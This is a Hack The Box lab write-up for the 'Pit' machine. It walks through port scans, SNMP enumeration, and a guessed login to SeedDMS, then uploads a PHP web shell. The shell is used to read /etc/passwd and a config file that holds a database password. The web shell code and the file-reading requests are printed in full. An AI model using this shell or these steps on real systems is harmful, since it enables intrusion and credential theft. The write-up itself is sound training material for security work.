Pit
Completed on September 21, 2021
Last updated
Was this helpful?
Completed on September 21, 2021
Last updated
Was this helpful?
Pit is a Linux based HTB machine that in some ways relies on the typical, and that is relying on SSH and HTTP to get into the system. The twist on it is the use of another service which quite frankly I had barely relied until now. It just emphasizes that you should never stop learning.
As a spoiler, the name of this box related to Cockpit. I would Google that if I were you!
As we need to know exactly what we are dealing with in terms of services available, we first run nmap, but in a way at first that will give us only the open ports.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> nmap -p- --min-rate=1000 -T4 pit.htb -oN Pit_OpenPort.log -oX Pit_OpenPorts.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 23:41 EDT
Nmap scan report for pit.htb (10.129.219.56)
Host is up (0.039s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
Nmap done: 1 IP address (1 host up) scanned in 122.64 seconds
As mentioned in the overview, we have SSH and HTTP accessible, but we also have TCP 9090. To make it easier on ourselves, we can create a variable from what the 'open port' log file contains.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> PORTS=$(cat Pit_OpenPort.log | grep tcp | cut -d "/" -f1 | xargs | tr " " ",")┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> nmap -sC -sV pit.htb -p $PORTS -oN Pit_PortScan.log -oX Pit_PortScan.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 23:47 EDT
Nmap scan report for pit.htb (10.129.219.56)
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
| vulners:
| cpe:/a:openbsd:openssh:8.0:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| CVE-2019-16905 4.4 https://vulners.com/cve/CVE-2019-16905
| MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT*
|_ CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
| vulners:
| cpe:/a:igor_sysoev:nginx:1.14.1:
| CVE-2019-9513 7.8 https://vulners.com/cve/CVE-2019-9513
| CVE-2019-9511 7.8 https://vulners.com/cve/CVE-2019-9511
| CVE-2021-23017 7.5 https://vulners.com/cve/CVE-2021-23017
| 1337DAY-ID-36300 7.5 https://vulners.com/zdt/1337DAY-ID-36300 *EXPLOIT*
| CVE-2019-9516 6.8 https://vulners.com/cve/CVE-2019-9516
| CVE-2018-16845 5.8 https://vulners.com/cve/CVE-2018-16845
|_ PACKETSTORM:162830 0.0 https://vulners.com/packetstorm/PACKETSTORM:162830 *EXPLOIT*
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.22 seconds┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vk -I http://pit.htb:9090 2>&1
* Trying 10.129.95.189:9090...
* Connected to pit.htb (10.129.95.189) port 9090 (#0)
> HEAD / HTTP/1.1
> Host: pit.htb:9090
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
< Content-Type: text/html
Content-Type: text/html
< Location: https://pit.htb:9090/
Location: https://pit.htb:9090/
< Content-Length: 73
Content-Length: 73
< X-DNS-Prefetch-Control: off
X-DNS-Prefetch-Control: off
< Referrer-Policy: no-referrer
Referrer-Policy: no-referrer
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
<
* Excess found: excess = 73 url = / (zero-length body)
* Connection #0 to host pit.htb left intactLet's retrieve the certificate content by using curl:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -I https://pit.htb:9090 2>&1
* Trying 10.129.95.189:9090...
* Connected to pit.htb (10.129.95.189) port 9090 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
* CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
* subject: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; CN=dms-pit.htb
* start date: Apr 16 23:29:12 2020 GMT
* expire date: Jun 4 16:09:12 2030 GMT
* issuer: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; OU=ca-5763051739999573755; CN=dms-pit.htb
* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> HEAD / HTTP/1.1
> Host: pit.htb:9090
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type: text/html
Content-Type: text/html
< Content-Security-Policy: connect-src 'self' https://pit.htb:9090 wss://pit.htb:9090; form-action 'self' https://pit.htb:9090; base-uri 'self' https://pit.htb:9090; object-src 'none'; font-src 'self' https://pit.htb:9090 data:; img-src 'self' https://pit.htb:9090 data:; block-all-mixed-content; default-src 'self' https://pit.htb:9090 'unsafe-inline'
Content-Security-Policy: connect-src 'self' https://pit.htb:9090 wss://pit.htb:9090; form-action 'self' https://pit.htb:9090; base-uri 'self' https://pit.htb:9090; object-src 'none'; font-src 'self' https://pit.htb:9090 data:; img-src 'self' https://pit.htb:9090 data:; block-all-mixed-content; default-src 'self' https://pit.htb:9090 'unsafe-inline'
< Set-Cookie: cockpit=deleted; PATH=/; Secure; HttpOnly
Set-Cookie: cockpit=deleted; PATH=/; Secure; HttpOnly
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Cache-Control: no-cache, no-store
Cache-Control: no-cache, no-store
< X-DNS-Prefetch-Control: off
X-DNS-Prefetch-Control: off
< Referrer-Policy: no-referrer
Referrer-Policy: no-referrer
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
<
* Excess found: excess = 5 url = / (zero-length body)
* Connection #0 to host pit.htb left intactWe see there is another site listed as the CN of this site, something we saw from nmap:
* Server certificate:
* subject: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; CN=dms-pit.htb
* start date: Apr 16 23:29:12 2020 GMT
* expire date: Jun 4 16:09:12 2030 GMT
* issuer: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; OU=ca-5763051739999573755; CN=dms-pit.htbLet's add this to our hosts file and retest against both TCP 80 and 9090.
Example:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> cat /etc/hosts | grep -i pit
10.129.220.187 pit.htb dms-pit.htbTCP 9090 sent us to the same page, BUT TCP 80 gave us a 403 error. Let's see what we can find there:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> dirb http://dms-pit.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -f -w -o Pit_dirb.txt -p http://127.0.0.1:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: Pit_dirb.txt
START_TIME: Sun Sep 19 11:34:15 2021
URL_BASE: http://dms-pit.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
PROXY: http://127.0.0.1:8080
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4696
---- Scanning URL: http://dms-pit.htb/ ----
+ http://dms-pit.htb/WS_FTP.LOG (CODE:403|SIZE:571)
+ http://dms-pit.htb/akeeba.backend.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/crossdomain.xml (CODE:403|SIZE:571)
+ http://dms-pit.htb/development.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/production.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/sitemap.xml (CODE:403|SIZE:571)
+ http://dms-pit.htb/spamlog.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/web.xml (CODE:403|SIZE:571)
-----------------
END_TIME: Sun Sep 19 11:44:07 2021
DOWNLOADED: 4696 - FOUND: 8
So we get nowhere. Every attempt gives us a 403. Given NGinx 1.14.1 has some vulnerabilities and one relates it to UDP DNS traffic, let's try and find any UDP ports this host might be listening to. For this, we will use masscan against all ports (both TCP and UDP) to get something quick.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> sudo masscan -e tun1 -p1-65535,U:1-65535 10.129.95.189 --rate=1000 | tee Pit_masscan.log
[sudo] password for htb:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-09-19 16:00:01 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.129.95.189
Discovered open port 9090/tcp on 10.129.95.189
Discovered open port 161/udp on 10.129.95.189
Discovered open port 80/tcp on 10.129.95.189 The above does not confirm out hunch from the NGinx 1.14.1 vulnerability and UDP DNS, but we did uncover SNMP is accessible.
Let's now use snmp-check against UDP 161 (snmp).
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> snmp-check 10.129.95.189
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.129.95.189:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.129.95.189
Hostname : pit.htb
Description : Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
Contact : Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
Location : Unknown (edit /etc/snmp/snmpd.conf)
Uptime snmp : 00:47:31.51
Uptime system : 00:47:00.48
System date : -
[*] Processes:
Id Status Name Path Parameters
1 runnable systemd /usr/lib/systemd/systemd --switched-root --system --deserialize 17
...
822 runnable systemd-journal /usr/lib/systemd/systemd-journald
857 runnable systemd-udevd /usr/lib/systemd/systemd-udevd
914 unknown kdmflush
918 unknown nfit
932 unknown xfs-buf/dm-2
933 unknown xfs-conv/dm-2
934 unknown xfs-cil/dm-2
935 unknown xfs-reclaim/dm-
936 unknown xfs-eofblocks/d
937 unknown xfs-log/dm-2
938 runnable xfsaild/dm-2
943 runnable jbd2/sda1-8
944 unknown ext4-rsv-conver
967 runnable auditd /sbin/auditd
969 runnable sedispatch /usr/sbin/sedispatch
1000 runnable VGAuthService /usr/bin/VGAuthService -s
1002 runnable vmtoolsd /usr/bin/vmtoolsd
1003 runnable dbus-daemon /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
1005 runnable irqbalance /usr/sbin/irqbalance --foreground
1006 runnable sssd /usr/sbin/sssd -i --logger=files
1009 runnable polkitd /usr/lib/polkit-1/polkitd --no-debug
1013 runnable chronyd /usr/sbin/chronyd
1021 runnable rngd /sbin/rngd -f --fill-watermark=0
1042 runnable sssd_be /usr/libexec/sssd/sssd_be --domain implicit_files --uid 0 --gid 0 --logger=files
1051 runnable sssd_nss /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
1052 runnable firewalld /usr/libexec/platform-python -s /usr/sbin/firewalld --nofork --nopid
1080 runnable systemd-logind /usr/lib/systemd/systemd-logind
1091 runnable NetworkManager /usr/sbin/NetworkManager --no-daemon
1097 runnable tuned /usr/libexec/platform-python -Es /usr/sbin/tuned -l -P
1098 runnable sshd /usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128
1143 runnable crond /usr/sbin/crond -n
1167 runnable nginx nginx: master process /usr/sbin/nginx
1168 runnable nginx nginx: worker process
1169 runnable nginx nginx: worker process
1180 runnable agetty /sbin/agetty -o -p -- \u --noclear tty1 linux
1201 runnable mysqld /usr/libexec/mysqld --basedir=/usr
1468 running snmpd /usr/sbin/snmpd -LS0-6d -f
1470 runnable rsyslogd /usr/sbin/rsyslogd -n
1713 unknown kworker/1:0-cgroup_destroy
1754 unknown kworker/u4:0-xfs-cil/dm-0
1870 unknown kworker/1:5-events
1983 unknown kworker/u4:1-events_unbound
2043 unknown kworker/0:0-cgroup_destroy
2170 unknown kworker/1:1-events
2173 unknown kworker/0:1-cgroup_pidlist_destroy
2194 unknown kworker/0:3-events_power_efficient
2233 runnable anacron /usr/sbin/anacron -s
2245 unknown kworker/1:2-cgroup_pidlist_destroy
2269 runnable php-fpm php-fpm: master process (/etc/php-fpm.conf)
2270 runnable php-fpm php-fpm: pool www
2271 runnable php-fpm php-fpm: pool www
2272 runnable php-fpm php-fpm: pool www
2273 runnable php-fpm php-fpm: pool www
2274 runnable php-fpm php-fpm: pool www
2277 unknown kworker/u4:2-events_unbound
2281 unknown kworker/1:3-events Even though the process list was truncated, it gave us some good information on what is going on in this box.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> /opt/snmp/snmpbw.pl pit.htb public 2 1
SNMP query: 10.129.95.189
Queue count: 0
SNMP SUCCESS: 10.129.95.189
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> #It's output!
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> grep var 10.129.95.189.snmp
.1.3.6.1.4.1.2021.9.1.2.2 = STRING: "/var/www/html/seeddms51x/seeddms"
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = No more variables left in this MIB View (It is past the end of the MIB tree)┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -I http://dms-pit.htb/seeddms51x/seeddms
* Trying 10.129.95.189:80...
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html
Content-Type: text/html
< Content-Length: 185
Content-Length: 185
< Location: http://dms-pit.htb/seeddms51x/seeddms/
Location: http://dms-pit.htb/seeddms51x/seeddms/
< Connection: keep-alive
Connection: keep-alive
<
* Connection #0 to host dms-pit.htb left intact
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/'
* Found bundle for host dms-pit.htb: 0x55a04a122b60 [serially]
* Can not multiplex, even if we wanted to!
* Re-using existing connection! (#0) with host dms-pit.htb
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms/ HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
HTTP/1.1 302 Found
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Connection: keep-alive
Connection: keep-alive
< X-Powered-By: PHP/7.2.24
X-Powered-By: PHP/7.2.24
< Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F
Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F
<
* Connection #0 to host dms-pit.htb left intact
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F'
* Found bundle for host dms-pit.htb: 0x55a04a122b60 [serially]
* Can not multiplex, even if we wanted to!
* Re-using existing connection! (#0) with host dms-pit.htb
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Connection: keep-alive
Connection: keep-alive
< X-Powered-By: PHP/7.2.24
X-Powered-By: PHP/7.2.24
< X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
< X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
<
* Connection #0 to host dms-pit.htb left intactAnd we seem to be hitting the login page of Seeddms, an open-source document management system.
Since we have no credentials, we go back to the SNMP dump and we only find the user 'michelle', but no password.
"Memory usage
total used free shared buff/cache available
Mem: 3.8Gi 328Mi 3.2Gi 8.0Mi 276Mi 3.3Gi
Swap: 1.9Gi 0B 1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
Labeling MLS/ MLS/
SELinux User Prefix MCS Level MCS Range SELinux Roles
guest_u user s0 s0 guest_r
root user s0 s0-s0:c0.c1023 staff_r sysadm
_r system_r unconfined_r
staff_u user s0 s0-s0:c0.c1023 staff_r sysadm
_r unconfined_r
sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
system_u user s0 s0-s0:c0.c1023 system_r uncon
fined_r
unconfined_u user s0 s0-s0:c0.c1023 system_r uncon
fined_r
user_u user s0 s0 user_r
xguest_u user s0 s0 xguest_r
login
Login Name SELinux User MLS/MCS Range Service
__default__ unconfined_u s0-s0:c0.c1023 *
michelle user_u s0 *
root unconfined_u s0-s0:c0.c1023 *
System uptime
13:21:30 up 2:03, 0 users, load average: 0.00, 0.00, 0.00"
We can try to access it by using michelle:michelle to start. Let's try to login and see what happens:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -X POST http://dms-pit.htb/seeddms51x/seeddms/op/op.Login.php \
-H "Content-Type: application/x-www-form-urlencoded" \
--proxy http://127.0.0.1:8080 \
> --data "login=michelle&pwd=michelle&lang=en_GB"
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST http://dms-pit.htb/seeddms51x/seeddms/op/op.Login.php HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 38
>
* upload completely sent off: 38 out of 38 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:29 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< Set-Cookie: mydms_session=0f66afe88c0e0fe171df8797c83dd346; path=/seeddms51x/seeddms/; HttpOnly
< Location: /seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1
< Content-Length: 0
<
* Closing connection 0
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1'
* Switch from POST to GET
* Hostname 127.0.0.1 was found in DNS cache
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#1)
> POST http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1 HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:39 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1
< Content-Length: 0
<
* Closing connection 1
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1'
* Hostname 127.0.0.1 was found in DNS cache
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#2)
> POST http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1 HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:50 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
< X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Length: 7449
<
<!DOCTYPE html>
<html>
...
</html>
* Closing connection 2And looks like we can get in (yes, I truncated the HTML code as we can't do anything with it at the moment).
We have to upload a document with a backdoor or a reverse shell. For this, we got to find a place to upload and looks like each user has its own folder.
Example of a "backdoor" to upload:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>After many attempts we get to find out php reverse shells do not work well here.
This is why we end up using the PHP exploit in the example above to do some command injection. Once we upload, we should be able to access the page and send our OS command by using http://<host>/data/1048576/<doc_id>/<filename>.php?cmd=<command>.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -isk -X GET \
--url 'http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id;cat+/etc/passwd' \
-H 'Host: dms-pit.htb' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'X-Requested-With: XMLHttpRequest' \
-b 'mydms_session=7099c4b735b5e2c8ea474bbf0720f90c' --proxy 'http://127.0.0.1:8080'
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Mon, 20 Sep 2021 04:17:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.24
Content-Length: 1601
<pre>uid=992(nginx) gid=988(nginx) groups=988(nginx) context=system_u:system_r:httpd_t:s0
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sssd:x:996:992:User for sssd:/:/sbin/nologin
chrony:x:995:991::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
michelle:x:1000:1000::/home/michelle:/bin/bash
setroubleshoot:x:994:990::/var/lib/setroubleshoot:/sbin/nologin
cockpit-ws:x:993:989:User for cockpit-ws:/nonexisting:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:992:988:Nginx web server:/var/lib/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-wsinstance:x:991:987:User for cockpit-ws instances:/nonexisting:/sbin/nologin
rngd:x:990:986:Random Number Generator Daemon:/var/lib/rngd:/sbin/nologin
</pre>%
Now, let's see what we can do here. We can use this to check on files we have access to, like SeedDMS's settings.xml file as it contains the SeedDMS configurations including how to authenticate to it.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -isk -X GET \
--url 'http://dms-pit.htb/seeddms51x/data/1048576/31/1.php?cmd=cat+../../../conf/settings.xml' \
-H 'Host: dms-pit.htb' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'X-Requested-With: XMLHttpRequest' \
-b 'mydms_session=7099c4b735b5e2c8ea474bbf0720f90c' --proxy 'http://127.0.0.1:8080'
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Mon, 20 Sep 2021 04:44:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.24
Content-Length: 11944
<pre><?xml version="1.0" encoding="UTF-8"?>
<configuration>
...
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
</database>
<!-- smtpServer: SMTP Server hostname
- smtpPort: SMTP Server port
- smtpSendFrom: Send from
-->
<smtp smtpServer="localhost" smtpPort="25" smtpSendFrom="seeddms@localhost" smtpUser="" smtpPassword=""/>
</system>
...
</advanced>
<extensions><extension name="example"/></extensions></configuration>
</pre>% And we in fact found some database credentials, but we have no way to test these at the moment as MySQL is not accessible but only to localhost.
